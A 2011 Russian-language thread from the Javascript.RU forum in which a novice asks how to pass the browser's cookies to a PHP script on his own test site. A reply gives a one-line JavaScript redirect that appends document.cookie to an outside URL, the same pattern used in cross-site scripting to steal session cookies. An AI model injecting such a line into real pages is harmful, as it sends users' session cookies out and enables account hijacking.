Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 04.10.2011, 11:35
Новичок на форуме
Отправить личное сообщение для microo10 Посмотреть профиль Найти все сообщения от microo10
 
Регистрация: 04.10.2011
Сообщений: 3

Помогите с javascript (window.location)
Помогите пожалуйста,мне на своем сайте надо передать php скрипту cookie,их можно прочитать вот этим скриптом через браузер:
javascript:document.write(document.cookie)

Надо задать полученные куки в php
javascript:window.location='http://test.ru/test.php?''

Например если cookie = 12345:
http://test.ru/test.php?1245

Как сделать скрипт который прочитает куки и передаст их в виде текста php файлу?
P.S сайт на денвере.
Ответить с цитированием
  #2 (permalink)  
Старый 04.10.2011, 11:38
Аватар для ksa
ksa ksa вне форума
CacheVar
Отправить личное сообщение для ksa Посмотреть профиль Найти все сообщения от ksa
 
Регистрация: 19.08.2010
Сообщений: 14,123

Сообщение от microo10
Как сделать скрипт который прочитает куки и передаст их в виде текста php файлу?
Таки прочитать те куки, сформировать УРЛ и отправить данные в тот ПХП...
Вроде алгоритм не сложный...
Ответить с цитированием
  #3 (permalink)  
Старый 04.10.2011, 11:39
Новичок на форуме
Отправить личное сообщение для microo10 Посмотреть профиль Найти все сообщения от microo10
 
Регистрация: 04.10.2011
Сообщений: 3

Сообщение от ksa Посмотреть сообщение
Таки прочитать те куки, сформировать УРЛ и отправить данные в тот ПХП...
Вроде алгоритм не сложный...
так вот я не могу сформулировать url,в JS новичок...просто для сайта надо...
___________
Кто может напишите скриптик(

Последний раз редактировалось microo10, 04.10.2011 в 11:47.
Ответить с цитированием
  #4 (permalink)  
Старый 04.10.2011, 11:53
Аватар для Snipe
Профессор
Отправить личное сообщение для Snipe Посмотреть профиль Найти все сообщения от Snipe
 
Регистрация: 06.05.2008
Сообщений: 765

Что-то странное у вас с куками.
12345 - это значение куки или имя?

Вот если делать конкретно что вы просите в своей заметке, тогда:
document.location.href = 'http://test.ru/test.php?'+document.cookie

Но это ерунда какая-то, ИМХО
Ответить с цитированием
  #5 (permalink)  
Старый 04.10.2011, 11:55
Новичок на форуме
Отправить личное сообщение для microo10 Посмотреть профиль Найти все сообщения от microo10
 
Регистрация: 04.10.2011
Сообщений: 3

Сообщение от Snipe Посмотреть сообщение
Что-то странное у вас с куками.
12345 - это значение куки или имя?

Вот если делать конкретно что вы просите в своей заметке, тогда:
document.location.href = 'http://test.ru/test.php?'+document.cookie

Но это ерунда какая-то, ИМХО
То что я и хотел,спасибо!)
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите с javascript andruhin Общие вопросы Javascript 12 04.05.2012 10:05
ПОМОГИТЕ!!! JavaScript aktau07 Общие вопросы Javascript 9 03.10.2011 23:10
Последние книги по JavaScript! monolithed Учебные материалы 7 26.10.2010 19:40
Выдвет ошибку JavaScript Ромио Opera, Safari и др. 4 21.10.2010 20:34
Помогите, пож, младенцу восстановить работоспобность JavaScript MishkaKosolapij Общие вопросы Javascript 4 16.08.2009 23:02